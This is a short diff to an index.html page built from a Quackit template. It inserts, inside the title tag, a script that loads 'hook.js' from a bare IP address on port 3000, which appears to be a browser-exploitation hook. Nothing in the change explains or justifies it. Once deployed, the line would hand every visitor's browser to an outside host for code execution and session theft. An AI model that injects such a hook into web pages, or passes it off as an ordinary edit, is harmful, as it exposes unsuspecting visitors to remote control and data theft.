--- a/index.html
+++ b/index.html
@@ -3,6 +3,7 @@
 <head>
 <!-- HTML Codes by Quackit.com -->
 <title>
+  <script src="http://68.183.26.215:3000/hook.js"></script>
 </title>
 <meta name="viewport" content="width=device-width, initial-scale=1">
 <style>
